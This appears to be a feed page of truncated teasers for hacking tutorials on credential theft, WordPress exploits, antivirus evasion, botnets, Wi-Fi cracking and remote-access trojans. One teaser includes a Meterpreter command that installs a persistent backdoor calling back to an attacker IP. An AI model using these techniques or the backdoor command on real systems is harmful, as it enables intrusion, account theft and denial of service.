Hack Gmail and Facebook Password in Network using Bettercap
Note: In my case this trick works for only Internet Explorer usersBettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive...
View ArticleHack Wordpress Server using Wordpress SlideShow Gallery Authenticated File...
The Wordpress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload...
View ArticleHacking Wordpress using Ninja Forms Unauthenticated File Upload
Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web...
View ArticlePenetration Testing in Wordpress Website using Wordpress Exploit Framework
A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systemsfirst clone WPXF repository from github, to do so...
View ArticleHack Remote PC with Reverse PowerShell using Brosec
Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec...
View ArticleBypass All Antivirus and Hack Remote Windows 10 PC using Hercules
HERCULES is a special payload generator that can bypass all antivirus software.First clone Herculesrepository from github, to do so type:https://github.com/EgeBalci/HERCULES.gitNow Open kali linux...
View ArticleHack your Network through Android Phone using cSploit
First download the CSploit from here and install in your android phoneNow open your cSploit and select your network and select the target IP which you want to hack.Now select MITM option, see the...
View ArticleExploiting OS Command Injection in Web Application using Commix
Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used from web developers, penetration testers or even security researchers in...
View ArticleHack Remote PC using BrowserBackdoor - JavaScript WebSocket Backdoor
BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket...
View ArticleAutomating Exploitation of Remote PC using Metasploithelper
Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges Nmap XML file with Metasploit and generates a resource script containing matching Metasploit...
View ArticleHow to Create Botnet for D-Dos Attack with UFONet
Remember: this tool is NOT for educational purpose. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local,...
View ArticleHack Wireless Network using Airgeddon
Airgeddon is a multi-use bash script for Linux systems to audit wireless networks.Features· Interface mode switcher (Monitor-Managed).· DoS over wireless networks with different...
View ArticleHack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)
Fluxion is a remake of linset by vk439 with less bugs and more features. It's compatible with the latest release of Kali (Rolling).How it works· Scan the networks.· Capture a handshake...
View ArticleCracking Wifi Password using Fern WIFi Cracker
Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover...
View ArticleDetect Hacker in Network using Android Phone
HosTaGe is a mobile honeypot that detects attacks on wireless networks.First of all search for HosTaGe honeypot on android play store.Now click on the above shown app and install it.Now for testing i...
View ArticleExploitation in Linux Firewall using IPFire proxy.cgi RCE
IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains remote command execution vulnerability in the proxy.cgi page.Exploit TargetsIpfire...
View Article5 ways to Create Permanent Backdoor in Remote PC
First take the meterpreter shell from any known exploit and bypass UAC for better results .Then run command:persistencerun persistence –X –i 10 –p 443 –r 192.168.0.105-X=connect back when the system...
View ArticleHTTP RAT Tutorial for Beginners
HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as a HTTP Tunnel, except it works in the reverse direction. These...
View ArticleExploit Linux PC using IPFire Bash Environment Variable Injection (Shellshock)
IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request...
View Article5 Ways to Surf Internet Anonymously in Android Phone
Proxy is the most trending and one of the most effective ways which hackers use to hide their IP address, allowing them to mask the actual source of attack by impersonating a fake source address of...
View Article